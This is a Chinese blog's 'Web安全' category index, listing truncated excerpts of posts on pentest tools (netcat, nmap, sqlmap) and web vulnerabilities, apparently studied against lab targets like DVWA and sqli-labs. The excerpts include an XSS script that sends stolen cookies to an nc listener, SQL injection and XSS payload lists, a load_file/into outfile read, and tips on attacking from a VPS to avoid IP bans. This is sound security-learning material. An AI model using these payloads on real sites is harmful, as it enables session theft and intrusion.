![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Web安全
文章平均质量分 74
这里主要用于记录一些Web安全中常见的Web漏洞的原理和利用方式
Simon_Smith
这个作者很懒,什么都没留下…
展开
-
nc瑞士军刀 (netcat) 和nc加密版ncat 更新中
nc传输的所有信息都是明文的nc一边要连接服务端,一般要连接控制端nc --help拓展:可以把nc进行改造 nc可以自解压成为一个小木马win下使用nc的方法:找到nc的目录,然后在当前目录下打开cmd,输入nc即可(一定要在cmd找到相应目录后 启动nc 直接点开nc没用)1.普通发送文字 保持通信服务端:监听4444端口(可以修改)(例如windows)nc -l -p 4444nc.exe -l -p 4444客户端:(例如Linux)nc -nv原创 2022-05-26 09:18:04 · 796 阅读 · 0 评论 -
Kali下的小工具的使用笔记
不会使用可以用程序 --help查看如何使用域名信息搜集工具1.dnsenum 域名搜集工具 会连接到一些引擎 比如google等会猜测可能存在的域名 并查询相应的网段 对c段进行whois查询等dnsenum --enum [域名地址]2.fierce 对子域名扫描和搜集 很多是字典查询等fierce --domain [目标域名]3.snmpcheck 可以用于snmp服务的探测snmpcheck -t [目标ip地址]...原创 2022-04-24 10:41:19 · 1210 阅读 · 0 评论 -
Nmap端口扫描器使用笔记 补充中
黑客更多像一个刺客。渗透测试厉害的人。百分之八十在做信息搜集 百分之10在做程序软件 剩下百分之10才会在攻击nmap全世界最厉害的扫描器活跃主机的识别工具会受防火墙等拦截 导致没办法扫描 zenmap就是nmap的图形界面版本一些功能:主机发现 需要知道内网有哪些主机是开机的 开放的端口扫描 需要知道端口针对的服务版本侦测 对应的服务的版本 可能会出现的漏洞操作系统指纹识别nmap //直接可以看到所有使用的命令nmap 192.1...原创 2022-04-21 17:32:36 · 2305 阅读 · 0 评论 -
技巧:XSS漏洞结合nc窃取Cookie实现免密码登录
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!)如果某天不能用外网,也不能用kali存储型xss最重要的是获取用户的cookie!!!!!!!!!!document.cookie获取用户所在网站的cookie1.在黑客端用nc进行监听nc -lvp 4444 //使用nc监听4444端口2.XSS注入的恶意script脚本<script>var img = docum...原创 2022-04-18 09:48:04 · 2014 阅读 · 0 评论 -
Apache-shiro漏洞利用合集
这里漏洞原理不再多进行赘述 主要是测试漏洞的利用过程漏洞1:shiro-550 CVE-2016-4437 shiro反序列化漏洞利用版本 Apache-shiro <1.2.4漏洞环境docker安装docker pull medicean/vulapps:s_shiro_1systemctl restart dockerdocker run -d -p 8081:8080 medicean/vulapps:s_shiro_1启动成功以后直接访问本地的8081端口即可原创 2022-04-15 17:17:54 · 2407 阅读 · 0 评论 -
DVWA靶场补充payload
XSS部分dvwa靶场adminpassword但凡出现互动的地方,都可能出现漏洞!!!!!<pre>Hello <script>alert('1')</script></pre>script标签是js语言执行用的,当js正确执行的时候,不会出现东西,js会被浏览器执行!!!!<scr<script>ipt>alert('1')</script>点住我!<img src="x"..原创 2022-04-14 11:05:31 · 1077 阅读 · 0 评论 -
★暴力破解漏洞(Burte Force)
暴力破解漏洞(Burte Force)借助足够的字典+Burp等工具repeat操作即可什么是暴力破解:连续性尝试+字典+自动化字典1.弱口令字典2.Github搜集3.只用指定字符生成(社工)4.社工库防范:1.要求用户设置复杂的密码2.每次认证使用安全的验证码3.对登录的行为做出判断和限制限制你的IP4.在必要的情况下使用双因素认证;技巧一:根据注册提示信息优化,在目标站点注册,搞清楚账号密码限制,比如大小写、密码长度限制。 技巧二原创 2022-04-14 10:47:53 · 1483 阅读 · 0 评论 -
★CSRF XXE和SSRF漏洞
CSRF(跨站请求伪造)可以欺骗用户进行点击,一旦用户点击了,攻击完成CSRF和XSS区别:CSRF类似于钓鱼链接,是欺骗用户,借助用户权限攻击,但是没有拿到用户权限而XSS是直接获取cookie,拿到用户权限pikachu靶场例题:(借助burpsuite)GET型CSRF1.先在提示中随便登录一个用户2.进入修改个人信息 测试:修改手机为9999993.burp抓包 然后点submitGET /pikachu/vul/csrf/csrfget/c原创 2022-04-14 10:44:44 · 686 阅读 · 0 评论 -
★文件包含漏洞
文件包含漏洞概念:把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数,这一调用文件的过程被称为包含。原理:文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含功能,但是文件包含漏洞在PHP Web Application中居多,而在JSP,ASP,ASP.NET程序中却非常少,这是有些语言设计的弊端,在PHP中.原创 2022-04-13 18:32:12 · 593 阅读 · 0 评论 -
★文件上传漏洞与Upload-labs靶场分析实战
网站常用后缀名phpphp3php5phtmlaspasacdxceraspxashxshtml小知识:防火墙常见函数<?php$a=" Wo jin tian lai LE! ";$b=trim($a); //trim() 首尾去空函数echo $b; //Wo jin tian lai LE!?><?php$b=deldot($a); // 删除文件名末...原创 2022-04-13 18:27:00 · 904 阅读 · 0 评论 -
Thinkphp框架漏洞payload整合
PS:针对不同的情况有些payload可能不适用 可以都尝试尝试 一定要自己审计理解原理部分payload来源以及合集来源:ThinkPHP漏洞复现_半盏时光、旧梦悠长的博客-CSDN博客_thinkphp复现深入学习理解可以参考如上的链接地址Thinkphp 5.0.5-5.0.22 Thinkphp 5.1.0-5.1.30 远程代码执行漏洞(5.0.20最适用)payload如下:(这是执行system函数的payload)在index.php后把响应内容..原创 2022-04-11 15:01:16 · 2224 阅读 · 0 评论 -
Linux提权之Suid提权 小部分归纳
Linux提权之Suid提权SUID是linux的一种权限机制具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权已知的可用于提权的linux可行性文件列表如下:NmapVimfindBashMoreLessNanocp使用如下命令可以发现系统上运行的所有SUID可执行的文件 命令将查找具有root权限的SUID的文件find /...原创 2022-04-08 21:36:22 · 1286 阅读 · 0 评论 -
Apache文件下载和目录遍历漏洞
文件下载漏洞+目录遍历漏洞不安全的文件下载概述文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../e原创 2022-04-08 11:33:25 · 1223 阅读 · 0 评论 -
Sqlmap工具使用笔记
pip install sqlmapSQLmap建议使用kali版本的 不建议使用windows版本攻击的时候建议使用vps去攻击 否则本地ip会很快被封sqlmapsqlmap -u "目标网址" --dbssqlmap -u "目标网址" -D [数据库名] --tablessqlmap -u "目标网址" -D [数据库名] -T [表名] --columnssqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump...原创 2022-04-07 09:31:41 · 4720 阅读 · 0 评论 -
VPS部署以及域名设置和DNS解析
SSD VPS Servers, Cloud Servers and Cloud Hosting by Vultr - Vultr.comhttps://www.vultr.com/1.购买vps首先,准备一台没有被墙的vps服务器 建议选择美国洛杉矶等地的vpsLinux服务器租用成功!2.购买或者部署域名Freenom - A Name for Everyonehttps://www.freenom.com/为了破除本身ip原创 2022-04-07 09:18:45 · 5211 阅读 · 1 评论 -
Google-Hacking 语法笔记
1.完全匹配搜索"黑客"2.模糊搜索*黑客*3.与"中国"+"高考"4.或"黑客"|"中国"5.非"GFW""GFW"-"中国"1.搜索指定域名的网页内容 可以用来搜索子域名 跟此域名相关的内容site:baidu.comsite:zhihu.com "黑客"2.搜素url网址存在特定关键词的网页inurl:/php?id=inurl:view.php=?inurl:/jsp?id=inurl:.asp?id=i...原创 2022-04-07 09:00:24 · 949 阅读 · 0 评论 -
★命令执行漏洞 Command Injection
命令执行漏洞/命令注入命令网站以操作系统的身份去执行某个命令ping 127.0.0.1 & ipconfig //在windows是执行完一个再执行后面一个 linux是几乎同时执行ping 127.0.0.1 && ipconfig //windwos是执行完前一个再执行后一个 Linux也是执行完前一个再执行后一个ping 127.0.0.1 &;& ipconfig//windows中不能用 linux中其中的分号可以被解析为空 可...原创 2022-04-05 21:23:31 · 1184 阅读 · 0 评论 -
xss-demon靶场通关payload
<script>alert(1)</script>0x00function render (input) {return '<div>' + input + '</div>'}<script>alert(1)</script>0x01function render (input) {return '<textarea>' + input + '&...原创 2022-04-05 21:19:32 · 1262 阅读 · 0 评论 -
XSS跨站脚本攻击漏洞(1)
XSS漏洞介绍:xss攻击的目录就是让前端把我们的攻击代码执行跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用)弹窗基本代码:<script>alert(1)</script>在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码因为本身存储框,留言板这种就会在...原创 2022-04-05 20:19:30 · 3216 阅读 · 1 评论 -
★PHP反序列化漏洞
1.普通的序列化和相应的反序列化代码操作2.反序列化漏洞利用1 参数个数错误从而wakeup函数不会被调用 一般防火墙都在wakeup函数这里 这样也就实现了绕过改变量的个数 会跳过wakeup 但是仍然会执行但是改变量长度和值的长度 wakeup也不会执行 但是对象已经不正常了当反序列化变量的个数不对,那么__wakeup就不会执行 直接执行了__destruct所以可以夹带私货一般网站牵扯到大型数据的传输 有时候就可以通过post或者get直接执行恶意语句举例:防..原创 2022-04-04 20:36:31 · 521 阅读 · 0 评论 -
★SQL注入写WebShell&&DNSlog注入(配合盲注)
SQL注入写webshell1.什么是一句话木马一句话木马是一种短小但是功能完善的木马客户端,通过它我们可以构造系统命令执行,从而达到控制操作系统的目的。它的隐蔽性好,功能强大。一般来说渗透过程中遵从先传小马,再传大马的逻辑。我们把恶意的函数写入到文件里去,通过访问文件,搭建平台会执行文件中的参数,而这个文件可以被我们利用来执行操作,从而达到了控制目标操作系统的目的。方法1:有三个条件:1.首先需要知道远程目录(猜测+经验)可以通过@@basedir 查询...原创 2022-03-22 09:17:14 · 506 阅读 · 0 评论 -
Redis数据库基础及未授权访问漏洞和利用
1.Redis数据库的介绍(1)nosql系列的数据库之一 (not only sql)(2)这个世界上的数据库分为关系型数据库和非关系型数据库(3)redis数据库是非关系型数据库 key-value形式(4)特点:内存运行,效率极高 而且支持分布式(5)支持很多语言的api(6)支持很多系统的(7)通信模型:c/s通信模式(8)支持单进程单线程(9)支持很多数据类型(10)支持高并发读写 阿里 淘宝都用这种数据库 mysql没办法支持这么大的并发(1...原创 2022-03-19 08:27:12 · 674 阅读 · 0 评论 -
★SQL注入漏洞(6)(8)POST注入 堆叠查询注入
POST注入只是传参方式上有所区别。方法上都是和GET类似的1.POST注入下的union select注入方法例题:sqli-labs中的T12猜测源码://post传入的两个参数名可以网页源代码查看 抓包也可以看到$u=$_POST['uname'];$p=$_POST['passwd'];select username,password from table1 where username='$u' and password='$p' limit 0,1;.原创 2022-03-19 08:26:34 · 321 阅读 · 0 评论 -
★SQL注入漏洞(3)(5) 万能密码和报错注入法
'or'1'='1'#'or'1'='1'--+第一个单引号和等号右边自带的一个引号闭合了,然后用or形成永正 有可能会把数据库的所有内容都回显出来然后注释符号把右边自带的引号也注释掉了 一般登录成功的账号也是数据库的第一个账号万能密码是一种比较低级的漏洞,有概率通过输入这种的万能语句从而登录成功!------------------------------------------------报错注入未必要and or也是可以执行报错函数注入的知识储备:...原创 2022-03-19 08:26:18 · 1133 阅读 · 0 评论 -
★SQL注入漏洞(7)SQL注入高级篇
分析目标防火墙并且跳过1.直接拉黑ip类防火墙2.过滤删除相应字符的防火墙1.waf注释符号过滤例题:Sqli-labs T23特点:注释符 --+ # 被过滤掉了 绕过方法:逻辑上补全闭合即可多加一次url编码只是更安全的绕过select * from users where id = '' limit 0,1select * from users where id = ' -1' union select 1,2,'3 ' limit 0...原创 2022-03-18 16:47:06 · 1415 阅读 · 0 评论 -
★SQL注入漏洞(4)注入方法3 盲注
判定结果有还是没有有直接union select会不会报错会报错就报错注入,都没有就盲注盲注---1.布尔盲注:(最好先猜出一个正确的用户名作为参照物才能进行盲注)适用条件:不显示错误,也不显示任何数据库取出的内容显示(没有闭合的报错 就要强行猜闭合方式)sqli-labs的T8 布尔盲注?id=1 正常 ?id=200000 不正常 ?id=1\ 不正常 ?id=haha 不正常估计到数据库传入的参数是数字尝试 id=1' --+ //正...原创 2022-03-18 16:41:34 · 1266 阅读 · 0 评论 -
★SQL注入漏洞(2)注入方法2之into outfile注入
into outfile/load_filename=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt这个into outfile不具备创建文件的能力...原创 2022-03-18 16:37:28 · 854 阅读 · 0 评论 -
★SQL注入漏洞(2)注入方法2 union联合注入
1.估算目标的数据库语法(可能性很多)select username,password from tablex where id=' 2\' limit 0,1select username,password from tablex where id=2 limit 0,1select username,password from tablex where id=(2) limit 0,12.黑客需要破坏数据库语句目的是为了知道数据库的闭合方式 一旦出现报错即破环成功这个世界上...原创 2022-03-18 16:35:24 · 1673 阅读 · 0 评论 -
★SQL注入漏洞(1)大纲和原理
按照注入方法分类:1.union select注入2.报错函数注入法3.盲注(布尔盲注/时间盲注)4.堆叠查询注入注入类型:GET型注入POST型注入(可以借助burpsuite)(更多的是针对账号和密码这种表单的形式)1.数字型输入2.字符型注入 (XX型注入 即("") (''))3.搜索型注入(like型)4.报错函数注入 适用:delete,insert/update 函数:updatexm...原创 2022-03-18 16:30:05 · 383 阅读 · 0 评论 -
Sqli-labs靶场payload(23-38进阶篇)原创
T23 单引号闭合 --+ #过滤 所以可以尝试补全的方法127.0.0.1/sqli-labs/Less-23/?id=1' or '1'='1127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,2,3 or '1'='1127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,database(),3 or '1'='1127.0.0.1/sqli-labs/Less-23/?id=-1' ..原创 2022-03-18 15:15:04 · 700 阅读 · 0 评论 -
Sqli-labs靶场payload(1-22基础篇)原创
T1 字符型 单引号闭合(union select注入)http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+T2数字型(union select注入)http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2http://127.0..原创 2022-03-18 15:08:53 · 759 阅读 · 0 评论 -
CVE-2018-12613 Phpmyadmin文件包含漏洞
phpMyAdmin文件包含漏洞利用条件:phpMyAdmin 4.8.0-4.8.1版本用户已经拥有登录进入phpmyadmin后台的账号和密码phpmyadmin配置文件位置WWW\phpMyAdmin4.8.0\libraries\config.default.php以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证:$cfg['AllowArbitraryServer']=true #攻击者可以指定.原创 2022-03-17 15:41:26 · 534 阅读 · 0 评论